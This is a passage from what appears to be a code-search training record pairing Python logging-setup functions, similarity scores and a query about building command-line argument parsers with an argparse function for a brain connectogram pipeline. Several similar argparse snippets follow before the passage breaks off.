logger.addHandler(console)\n\n return logger", "def setup_logging(debug=False):\n today = date.today()\n logfile = \"{:04}-{:02}-{:02}-classperf.log\".format(\n today.year, today.month, today.day\n )\n\n teelogger = getLogger(\"opengever-time-layers\")\n formatter = Formatter(\"\")\n\n filehandler = FileHandler(logfile, mode=\"w\")\n filehandler.setFormatter(formatter)\n\n stdouthandler = StreamHandler(stream=stdout)\n stdouthandler.setFormatter(formatter)\n\n if debug:\n teelogger.setLevel(DEBUG)\n else:\n teelogger.setLevel(INFO)\n\n teelogger.addHandler(filehandler)\n teelogger.addHandler(stdouthandler)\n\n return teelogger", "def my_custom_logger(logger_name, level=logging.INFO):\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n format_string = ('%(asctime)s, %(levelname)s, %(filename)s, %(message)s')\n log_format = logging.Formatter(format_string)\n # Creating and adding the console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_format)\n logger.addHandler(console_handler)\n # Creating and adding the file handler\n file_handler = logging.FileHandler(logger_name, mode='a')\n file_handler.setFormatter(log_format)\n logger.addHandler(file_handler)\n return logger", "def initLogging ( logFile ):\n logging.basicConfig(\n filename=logFile,\n level=logging.INFO,\n format='%(asctime)s %(levelname)-8s %(message)s',\n filemode='w'\n )", "def _setup_std_logging (logger, log_file, verbose):\n class debug_filter(logging.Filter):\n \"\"\"\n Ignore INFO messages\n \"\"\"\n def filter(self, record):\n return logging.INFO != record.levelno\n\n class NullHandler(logging.Handler):\n \"\"\"\n for when there is no logging\n \"\"\"\n def emit(self, record):\n pass\n\n # We are interesting in all messages\n logger.setLevel(logging.DEBUG)\n has_handler = False\n\n # log to file if that is specified\n if log_file:\n handler = logging.FileHandler(log_file, delay=False)\n handler.setFormatter(logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)6s - %(message)s\"))\n handler.setLevel(MESSAGE)\n logger.addHandler(handler)\n has_handler = True\n\n # log to stderr if verbose\n if verbose:\n stderrhandler = logging.StreamHandler(sys.stderr)\n stderrhandler.setFormatter(logging.Formatter(\" %(message)s\"))\n stderrhandler.setLevel(logging.DEBUG)\n if log_file:\n stderrhandler.addFilter(debug_filter())\n logger.addHandler(stderrhandler)\n has_handler = True\n\n # no logging\n if not has_handler:\n logger.addHandler(NullHandler())", "def setup_logging(module=None, level=logging.INFO): # pragma: no cover\n logger = logging.getLogger(module or '')\n logger.setLevel(level)\n logging.Formatter.converter = time.gmtime\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(processName)s - %(levelname)s - %(message)s'\n )\n stream_handler = logging.StreamHandler(sys.stderr)\n stream_handler.setLevel(level)\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n return logger", "def create_logger(app_name: str) -> logging.Logger:\n if not os.path.exists(os.path.join(os.getcwd(), 'logs')):\n os.mkdir(os.path.join(os.getcwd(), 'logs'))\n\n app_logfile = os.path.join(os.getcwd(), 'logs', f'{app_name}.log')\n\n logger = logging.getLogger(f\"{app_name}-logger\")\n logger.setLevel(logging.DEBUG)\n\n handler = logging.handlers.RotatingFileHandler(filename=app_logfile, mode='a', maxBytes=20000, backupCount=10)\n handler.setLevel(logging.DEBUG)\n\n # Set the formatter\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | 
%(message)s\", \"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n\n # Set it as the base handler\n logger.base_handler = handler\n\n # Also add a newline handler to switch to later\n newline_handler = logging.FileHandler(filename=app_logfile, mode='a')\n newline_handler.setLevel(logging.DEBUG)\n newline_handler.setFormatter(logging.Formatter(fmt='')) # Must be an empty format\n \n logger.newline_handler = newline_handler\n\n # Also add the provision for a newline handler using a custom method attribute\n logger.newline = types.MethodType(add_newlines, logger)\n\n # Also add a StreamHandler for printing to stderr\n console_handler = logging.StreamHandler()\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n console_handler.setFormatter(formatter)\n \n logger.addHandler(console_handler)\n\n return logger", "def initialize_logger(self):\n\n # initialize logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n # logger console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(logging.Formatter(\"\"))\n logger.addHandler(console_handler)", "def initialize_logger(filename=None, level=logging.DEBUG, filemode='w'):\n log_format = '%(asctime)s %(levelname)s\\n' + \\\n ' %(filename)s:%(lineno)s: %(name)s %(message)s'\n\n if filename is None:\n handler = logging.StreamHandler()\n else:\n handler = logging.handlers.RotatingFileHandler(\n filename=filename, mode=filemode)\n\n handler.setFormatter(logging.Formatter(log_format))\n logger = logging.getLogger('LOG')\n logger.addHandler(handler)\n logger.setLevel(level)\n\n return logger, handler", "def __create_logger(who, level):\n global loggers\n global toconsole\n global LEVELS\n global console\n global logfile\n loggers[who] = logging.getLogger(who)\n loggers[who].setLevel(level)\n format = logging.Formatter(\"%(asctime)s - %(name)s - \"\\\n \"%(levelname)s - %(message)s\")\n if (toconsole):\n if (console == None):\n console = logging.StreamHandler()\n console.setFormatter(format)\n loggers[who].addHandler(console)\n else:\n if (logfile == None):\n logfile = logging.handlers.RotatingFileHandler('/var/log/yapc.log',\n maxBytes=10485760,\n backupCount=10)\n logfile.setFormatter(format)\n loggers[who].addHandler(logfile)\n loggers[GENERIC_LOG_NAME].log(LEVELS[\"VDBG\"],\n \"Add logger for \"+who+\" at level \"+str(level))", "def configure_py_log(directory=None, filename=sys.argv[0], mode=\"w\"):\n if directory is None:\n logging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )\n else:\n logging.basicConfig(\n filename=os.path.join(directory, filename),\n filemode=mode,\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )", "def _logger(self):\n logger = logging.getLogger(self.NAME)\n logger.setLevel(self.LOG_LEVEL)\n shandler = logging.StreamHandler(sys.stdout)\n fmt = '\\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():'\n fmt += '%(lineno)d %(asctime)s\\033[0m| %(message)s'\n shandler.setFormatter(logging.Formatter(fmt))\n logger.addHandler(shandler)\n return logger" ]
[ "0.7268376", "0.70308805", "0.7029211", "0.7027607", "0.6950778", "0.6924888", "0.6906252", "0.6870268", "0.6851774", "0.68211913", "0.6813843", "0.6808933", "0.68085176", "0.6753689", "0.67525923", "0.6736932", "0.67316926", "0.67220473", "0.67183745", "0.6701308", "0.6691116", "0.66806465", "0.66781086", "0.6653156", "0.66483897", "0.6647405", "0.6645173", "0.6641966", "0.66297245", "0.66241837", "0.6617823", "0.6614719", "0.6592336", "0.6581851", "0.658022", "0.6576932", "0.6569667", "0.6567263", "0.65653235", "0.65451866", "0.65181166", "0.6517757", "0.65120286", "0.65120286", "0.65120286", "0.65120286", "0.65048116", "0.6487694", "0.6486355", "0.64861864", "0.6484511", "0.6477887", "0.6473358", "0.6466693", "0.64628655", "0.645347", "0.64518106", "0.64304644", "0.64294565", "0.64291346", "0.64175814", "0.6409891", "0.6400956", "0.63897", "0.6381571", "0.6380249", "0.63721997", "0.636858", "0.6367548", "0.6367443", "0.6366547", "0.63664377", "0.63643515", "0.63587314", "0.6349357", "0.63492733", "0.6344795", "0.63432163", "0.63361645", "0.6328344", "0.6326782", "0.63252485", "0.6324357", "0.6323715", "0.6321257", "0.6313704", "0.6308728", "0.6307855", "0.63001937", "0.629928", "0.62912065", "0.6288676", "0.6284829", "0.6269904", "0.62686443", "0.62668264", "0.62610054", "0.6257352", "0.625634", "0.6251679" ]
0.65178096
41
Create a command line argument parser, run it and return a dict mapping <argument name> -> <argument value>.
def get_cmd_line_args(): usage = "%(prog)s <subject id> <nodif_brain> <bedpostx_dir> <outdir> [options]" parser = argparse.ArgumentParser(prog = "python probabilist_connectogram.py", usage = usage) # Required arguments parser.add_argument("subject_id", help="The name of the subject's folder in <SUBJECTS_DIR>.") parser.add_argument("nodif_brain", help="A preprocessed brain-only volume with bvalue=0.") parser.add_argument("bedpostx_dir", help="The bedpostx output directory for the subject's DWI data.") parser.add_argument("outdir", help="Directory where to output.") # Optional arguments parser.add_argument("--cortical-atlas", default="Desikan", choices=["Desikan", "Destrieux"], metavar="<atlas name>", help="Cortical atlas name, 'Desikan' (default) or 'Destrieux'") parser.add_argument("--remove-subcortical", action="store_true", help="Remove subcortical regions from the connectogram " "(Thalamus, Caudate, Putamen, Pallidum, Hippocampus, " "Amygdala, Accumbens-area and VentralDC).") parser.add_argument("--tracto-mask-type", default="nodif_brain", choices=TractoMaskTypes.choices, metavar="<tracto mask type>", help='The type of tractography mask to create, allowed types: ' '"nodif_brain" (default, whole brain), "wm", ' '"wm_dilated_1vox_6conn" or "wm_dilated_1vox_14conn". ' 'Two of the proposed white matter masks are dilated because a ' 'non-dilated white matter mask does not overlap with the "gray" ' 'subcortical regions, therefore the samples will never get there. ' 'Moreover the right and left white matter regions are much less ' 'connected without dilation, therefore the connectogram shows ' 'few interhemisphere connections with a simple white matter mask. ' '"wm_dilated_1vox_6conn" means white matter dilated by 1 voxel ' 'based one a 6-connexity structuring element.') parser.add_argument("--nsamples", type=int, default=5000, metavar="<nsamples>", help="Number of samples per voxel to initiate in seed " "region (default 5000).") parser.add_argument("--nsteps", type=int, default=2000, metavar="<nsteps>", help="Maximum number of steps for a sample (default 2000).") parser.add_argument("--fs-subjects-dir", metavar="<Freesurfer subjects directory>", help="To bypass the $SUBJECTS_DIR environment variable.") # Create a dict of arguments to pass to the 'main' function args = parser.parse_args() kwargs = vars(args) # Adapt one argument to the 'main' interface kwargs["add_subcortical"] = not kwargs["remove_subcortical"] del kwargs["remove_subcortical"] return kwargs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main_parse_args():\n parser = ArgumentParser()\n parser.add_argument('infile', help='path to the file to be mapped.It should\\\n contain one identifer on each line.')\n parser.add_argument('-rh', '--redis_host', default=DEFAULT_REDIS_URL,\n help='url of Redis db')\n parser.add_argument('-rp', '--redis_port', default=DEFAULT_REDIS_PORT,\n help='port for Redis db')\n parser.add_argument('-rps', '--redis_pass', default=DEFAULT_REDIS_PASS,\n help='password for Redis db')\n parser.add_argument('-of', '--outfile', default=None,\n help='path to the output file')\n parser.add_argument('-sh', '--source_hint', help='suggestion for ID source \\\n database used to resolve ambiguities in mapping',\n default=DEFAULT_HINT)\n parser.add_argument('-t', '--taxon', help='taxon id of species of all gene \\\n names', default=DEFAULT_TAXON)\n myargs = parser.parse_args()\n return myargs", "def retrieve_args_dict():\n process_args = sys.argv[1:]\n dictionary = dict()\n for process_arg in process_args:\n splitted = process_arg.split(\":\")\n if len(splitted) > 1:\n key = splitted[0]\n value = \"\".join(splitted[1:])\n dictionary[key] = value\n return dictionary", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def crude_arg_parser(args=sys.argv):\n args_dict = {}\n key = None\n for e in args[1:]:\n if e[:2] == '--':\n if key:\n args_dict[key] = True # Switch arg\n key = e[2:]\n elif key:\n args_dict[key] = e\n key = None\n\n return args_dict", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--urls_dirpath', type=unicode)\n parser.add_argument('-r', '--resources_dir', type=unicode)\n parser.add_argument('-t', '--total_docs', type=int)\n parser.add_argument('-m', '--mapping', type=unicode,\n help='File with the yago to lkif mapping')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"\"\"\n Generates json files with all the combinations of\n hyperparameter values from a configuratio file.\n \"\"\")\n\n parser.add_argument('outdir', help='output directory')\n parser.add_argument('config', help='configuration file')\n\n return parser.parse_args()", "def parse_arguments(args: list = None) -> Dict[str, str]:\n arg_parser = argparse.ArgumentParser(description=\"Console command to crypt \"\n \"and decrypt texts using \"\n \"classic methods. 
It also \"\n \"performs crypto attacks \"\n \"against those methods.\\n\",\n epilog=\"Follow cifra development at: \"\n \"<https://github.com/dante-signal31/cifra>\")\n cifra_subparsers = arg_parser.add_subparsers(help=\"Available modes\",\n dest=\"mode\",\n required=True)\n # DICTIONARY MANAGEMENT.\n dictionary_parser = cifra_subparsers.add_parser(name=\"dictionary\",\n help=\"Manage dictionaries to \"\n \"perform crypto attacks.\")\n dictionary_actions_subparser = dictionary_parser.add_subparsers(help=\"Action to perform.\",\n dest=\"action\")\n # DICTIONARY CREATION.\n dictionary_create_parser = dictionary_actions_subparser.add_parser(name=\"create\",\n help=\"Create a dictionary of unique words.\")\n dictionary_create_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to create.\",\n metavar=\"NEW_DICTIONARY_NAME\")\n dictionary_create_parser.add_argument(\"-i\", \"--initial_words_file\",\n type=_check_is_file,\n help=\"Optionally you can load in the dictionary words located in a text file\",\n metavar=\"PATH_TO FILE_WITH_WORDS\")\n # DICTIONARY REMOVAL.\n dictionary_delete_parser = dictionary_actions_subparser.add_parser(name=\"delete\",\n help=\"Remove an existing dictionary.\")\n dictionary_delete_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to delete.\",\n metavar=\"DICTIONARY_NAME_TO_DELETE\")\n # DICTIONARY UPDATING.\n dictionary_update_parser = dictionary_actions_subparser.add_parser(name=\"update\",\n help=\"Add words to an existing dictionary.\")\n dictionary_update_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to update with additional words.\",\n metavar=\"DICTIONARY_NAME_TO_UPDATE\")\n dictionary_update_parser.add_argument(\"words_file\",\n type=_check_is_file,\n help=\"Pathname to a file with words to add to dictionary\",\n metavar=\"PATH_TO_FILE_WITH_WORDS\")\n # DICTIONARY LISTING.\n _ = dictionary_actions_subparser.add_parser(name=\"list\",\n help=\"Show existing dictionaries.\")\n # CIPHER MANAGEMENT.\n cipher_parser = cifra_subparsers.add_parser(name=\"cipher\",\n help=\"Cipher a text using a key.\")\n cipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to cipher.\",\n metavar=\"ALGORITHM_NAME\")\n cipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to cipher.\",\n metavar=\"CIPHERING_KEY\")\n cipher_parser.add_argument(\"file_to_cipher\",\n type=_check_is_file,\n help=\"Path to file with text to cipher.\",\n metavar=\"FILE_TO_CIPHER\")\n cipher_parser.add_argument(\"-o\", \"--ciphered_file\",\n type=str,\n help=\"Path to output file to place ciphered text. 
If not used then\"\n \"ciphered text will be dumped to console.\",\n metavar=\"OUTPUT_CIPHERED_FILE\")\n cipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # DECIPHERING MANAGEMENT\n decipher_parser = cifra_subparsers.add_parser(name=\"decipher\",\n help=\"Decipher a text using a key.\")\n decipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to decipher.\",\n metavar=\"ALGORITHM_NAME\")\n decipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to decipher.\",\n metavar=\"CIPHERING_KEY\")\n decipher_parser.add_argument(\"file_to_decipher\",\n type=_check_is_file,\n help=\"Path to file with text to decipher.\",\n metavar=\"FILE_TO_DECIPHER\")\n decipher_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n decipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # ATTACK MANAGEMENT\n attack_parser = cifra_subparsers.add_parser(name=\"attack\",\n help=\"Attack a ciphered text to get its plain text\")\n attack_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to attack.\",\n metavar=\"ALGORITHM_NAME\")\n attack_parser.add_argument(\"file_to_attack\",\n type=_check_is_file,\n help=\"Path to file with text to attack.\",\n metavar=\"FILE_TO_ATTACK\")\n attack_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. 
If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n attack_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n\n parsed_arguments = vars(arg_parser.parse_args(args))\n filtered_parser_arguments = {key: value for key, value in parsed_arguments.items()\n if value is not None}\n return filtered_parser_arguments", "def command_line_parse(iargs=None):\n\n parser = create_parser()\n inps = parser.parse_args(args=iargs)\n\n return inps", "def parse_args():\n parser = argparse.ArgumentParser(description=\"evaluate the recovered derg by comparing with ground truth mapping file\")\n parser.add_argument(\"-mapping\", action=\"store\", dest=\"mapping_file\",\n required=True, help=\"path to proguard-generated mapping.txt\")\n parser.add_argument(\"-recovered_derg\", action=\"store\", dest=\"recovered_derg\",\n required=True, help=\"path to recovered derg\")\n parser.add_argument(\"-nice2predict_mapping\", action=\"store\", dest=\"nice2predict_mapping_file\",\n help=\"path to nice2predict-generated mapping.txt\")\n parser.add_argument(\"-o\", action=\"store\", dest=\"report_dir\",\n default=\".\", help=\"directory of report files\")\n parser.add_argument(\"-report_name\", action=\"store\", dest=\"report_name\",\n default=DEFAULT_REPORT_NAME, help=\"name of report file\")\n parser.add_argument(\"-match_mode\", action=\"store\", dest=\"match_mode\",\n default=MATCH_MODE_EXACT, help=\"match mode\")\n\n options = parser.parse_args()\n print options\n return options", "def parse_arguments(args):", "def _parse_args():\n parser = argparse.ArgumentParser(description='Run DAFI.')\n parser.add_argument('input_file', help='Name (path) of input file')\n return parser.parse_args()", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def parse_args():\n\tparser = argparse.ArgumentParser(description=\"comparing proguard-generated and predict mappings\")\n\tparser.add_argument(\"--proguard\", action=\"store\", dest=\"proguard_mappings_dir\",\n\t\t\t\t\t\trequired=True, help=\"directory of proguard-generated mappings file\")\n\tparser.add_argument(\"--predict\", action=\"store\", dest=\"predict_mappings_dir\",\n\t\t\t\t\t\trequired=True, help=\"directory of predict mappings file\")\n\tparser.add_argument(\"-o\", action=\"store\", dest=\"report_path\",\n\t\t\t\t\t\trequired=True, help=\"directory of report file\")\n\n\toptions = parser.parse_args()\n\tprint options\n\treturn options", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Create timezone info JSON file from tzdata files\")\n parser.add_argument(\"-v\", \"--vzic\", dest=\"vzic_path\", required=True,\n help=\"\"\"Path to the `vzic` executable. 
This must be\n downloaded from https://code.google.com/p/tzurl/ and\n compiled.\"\"\")\n parser.add_argument(\"-t\", \"--tzdata\", dest=\"tzdata_path\",\n help=\"\"\"Path to a directory containing the IANA\n timezone data. If this argument is omitted, the data\n will be downloaded from ftp.iana.org.\"\"\")\n return parser.parse_args()", "def _get_args(self):\n parser = ArgumentParser(\n description=\"Dynamically generates Snakefiles for data \"\n \"integration and machine learning pipelines.\"\n )\n\n parser.add_argument(\n \"-c\",\n \"--config\",\n help=(\n \"Configuration filepath. (Will look for file named config.yml \"\n \"in current working directory, if none specified.)\"\n ),\n )\n\n parser.add_argument(\n \"-r\",\n \"--run\",\n default=False,\n help=(\n \"Runs pipeline, in addition to generating Snakefile.\"\n ),\n )\n\n # convert command-line args to a dict and return\n args = parser.parse_args()\n\n args = dict(\n (k, v) for k, v in list(vars(args).items()) if v is not None\n )\n\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description='Convert environment variables in to a configuration file')\n parser.add_argument('-p',\n '--prefix',\n help='Prefix of env vars to parse',\n required=True)\n parser.add_argument('-f',\n '--format',\n help='Output file format',\n default='ini',\n choices=['ini', 'json'])\n parser.add_argument('-o',\n '--output-file',\n help='Outfile file path',\n default='/dev/stdout')\n parser.add_argument(\n '-r',\n '--reference-file',\n type=argparse.FileType('r'),\n help='Load this reference file for existing/hard coded values')\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser(prog='scoring')\n parser.add_argument(\"pdb_list\", help=\"list of PDB structures\")\n script_args = parser.parse_args()\n return script_args", "def parse_arguments():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--accessions\", help=\"A json file with old/new family mapppings\")\n parser.add_argument(\"--add-header\", help=\"Print descriptive header\",\n action=\"store_true\", default=False)\n parser.add_argument(\"--add-links\", help=\"Creates hyperlinks to available Rfam html content\",\n action=\"store_true\", default=False)\n return parser", "def arg_parse():\n p = ap.ArgumentParser()\n p.add_argument()\n return p.parse_args()", "def parse_arguments():\n\n args = Arguments()\n parser = argparse.ArgumentParser(\"Update river flow directions\")\n parser.add_argument('python_config_filename',\n metavar='python-config-filename',\n help='Full path to python configuration file',\n type=str)\n #Adding the variables to a namespace other than that of the parser keeps the namespace clean\n #and allows us to pass it directly to main\n parser.parse_args(namespace=args)\n return args", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Reads datapacket pcds, interpolates quaternions and generates scans from dataset in config file\")\n parser.add_argument(\"--visualization\", \"-v\", action=\"store_true\", help=\"if generated clouds should be visualized\")\n parser.add_argument(\"--directory\", \"-d\",\n help=\"if only specified directory should be interpolated, e.g. 
'fragments/fragment0'\")\n args = parser.parse_args()\n return args.visualization, args.directory", "def main():\n args = parse_args()\n process_args(args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--zarr_dir',\n type=str,\n help='path to directory of zarr files',\n )\n parser.add_argument(\n '--tiff_dir',\n type=str,\n help='path to directory of tiff files',\n )\n parser.add_argument(\n '--output_dir',\n type=str,\n help='path to directory for writing',\n )\n parser.add_argument(\n '--config_path',\n type=str,\n default=None,\n help='path to yaml preprocess config file',\n )\n \n args = parser.parse_args()\n return args", "def arg_parse():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\",\n \"--fpath\",\n type=str,\n required=True,\n help=\"Path to files to generate test data from e.g. /badc/cmip5/data/cmip5/output1/MOHC/HadGEM2-ES/rcp85/mon/atmos/Amon/r1i1p1/latest/tas\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--time_only\",\n default=False,\n help=\"Only generate one time step of this dataset\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--step\",\n type=int,\n default=100,\n help=\"Step to select latitude/longitude by. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--number\",\n type=int,\n default=0,\n help=\"Number of files to generate. Default is all files. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--level\",\n type=int,\n default=-1,\n help=\"Number of levels to extract, starting with index 0.\",\n )\n\n parser.add_argument(\n \"-c\", \"--compress\", help=\"Compress the files.\", action=\"store_true\"\n )\n\n return parser.parse_args()", "def parseCommandLine(argv):\n parameters = {}\n for p in argv[1:]: # skip 0th element (module name)\n pair = split(p, '=', 1)\n if (2 != len(pair)):\n print 'bad parameter: %s (had no equals sign for pairing)' % p\n sys.exit()\n else:\n parameters[pair[0]] = pair[1]\n return parameters", "def parse_args():\n parser = argparse.ArgumentParser(description='Create a database server to save and return key pair values')\n parser.add_argument('--ip', type=str, required=False, default='localhost', help='IP for server to listen on')\n parser.add_argument('--port', type=int, required=False, default=4000, help='Port for server to listen on')\n\n return parser.parse_args()", "def parse_command_line(argv):\n import argparse\n parser = argparse.ArgumentParser(\n description=\"\"\"\\\nShow information about a list of scales in Neuroglancer \"info\" JSON file format\n\"\"\")\n parser.add_argument(\"info_file\", nargs=\"?\", default=\"./info\",\n help=\"JSON file containing the information\")\n args = parser.parse_args(argv[1:])\n return args", "def command_line_start(argv, program_name):\n cl_parser = argparse.ArgumentParser(description='Tinkerforge Data Logger')\n\n cl_parser.add_argument('config_file', help=\"Path to the configuration file\")\n cl_parser.add_argument('-v', action=\"store_true\", dest=\"validate\",\n help=\"Just process the validation of the configuration file\")\n\n results = cl_parser.parse_args(argv)\n\n arguments_map = {}\n arguments_map[CONSOLE_CONFIG_FILE] = results.config_file\n arguments_map[CONSOLE_VALIDATE_ONLY] = results.validate\n\n return arguments_map", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--debug\",\n help=\"Print lots of debugging statements\",\n action=\"store_const\",\n dest=\"loglevel\",\n 
const=logging.DEBUG,\n default=logging.ERROR,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.INFO,\n )\n parser.add_argument(\"runscript\", default=None)\n return parser.parse_args()", "def get_args():\n parser = argparse.ArgumentParser(description='A json parser with filters')\n parser.add_argument('-f', '--filename', help='The Json file to parse')\n parser.add_argument('-v', '--verbosity', action='count', default=0,\n help='Increase verbosity of console log')\n parser.add_argument('-o', '--outfile', type=str, help='File to output to')\n parser.add_argument('-i', '--indent', type=int, default=4,\n help='Number of spaces to indent')\n parser.add_argument('-k', '--keyfilter',\n help=('Key filter for the json output separated by \".\"'\n 'page.module.element.note, use partial string'\n ' or * for all'))\n parser.add_argument('-d', '--datafilter', type=str,\n help=('Data Value filter of the key:value pair. '\n 'NOTE: keyfiltering occurs first.'))\n args = parser.parse_args()\n return args", "def _parse_arguments():\n parser = argparse.ArgumentParser(\n prog=\"JSON sorter\",\n description=\"Take a json file, sort the keys and insert 4 spaces for indents.\",\n )\n\n parser.add_argument(\n \"input\", help=\"JSON file to parse.\",\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=sys.stdout,\n type=argparse.FileType(mode=\"w\"),\n help=\"File to write to. Defaults to stdout.\",\n )\n\n # Should probably implement this and CSV as subcommands\n parser.add_argument(\n \"-y\",\n \"--yaml\",\n action=\"store_true\",\n help=\"Whether to sort a YAML file provided as the input.\",\n )\n\n # is there a way to have info printed with this from argparse?\n parser.add_argument(\n \"-l\",\n \"--log\",\n action=\"store_true\",\n help=\"Turn logging on and print to console.\",\n )\n\n parser.add_argument(\n \"-ll\",\n \"--log_level\",\n dest=\"log_level\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n help=\"Set the logging level\",\n )\n\n parser.add_argument(\n \"-V\", \"--version\", action=\"version\", version=\"%(prog)s\" + __version__\n )\n\n if len(sys.argv[1:]) == 0:\n parser.print_help()\n sys.exit()\n\n args = parser.parse_args()\n return args", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. 
use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def ParseArguments():\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('-f', '--file', help='Text file to be used (e.g. mem/sample_mem.txt)')\n parser.add_argument('--memsize', help='Memory size of generated memory')\n parser.add_argument('--memrange', help='Max range of memory in generated memory')\n parser.add_argument('--mempattern', help='Generated memory pattern focus (normal, loops, rep, random)')\n parser.add_argument('--cachesize', help='Cache size to be used')\n parser.add_argument('--linesize', help='Cache line size to be used')\n parser.add_argument('--mult', help='Run an entered number of simulations back-to-back')\n parser.add_argument('-t', '--test', help='Run tests to verify the simulator is functioning properly', action=\"store_true\")\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Google reminders cli',\n epilog=usage,\n formatter_class=argparse.RawTextHelpFormatter)\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parse(self, command_line=sys.argv[1:]):\n return self._parser.parse_args(command_line)", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # All reference encoders\n parser.add_argument(\"--step\", dest=\"step\", default=\"10\", type=int, help=\"step size\")\n parser.add_argument(\"--repeats\", dest=\"repeats\", type=int, default=1, help=\"repeats\")\n\n parser.add_argument(dest=\"image\", default=None,\n help=\"select the test image to run\")\n\n args = 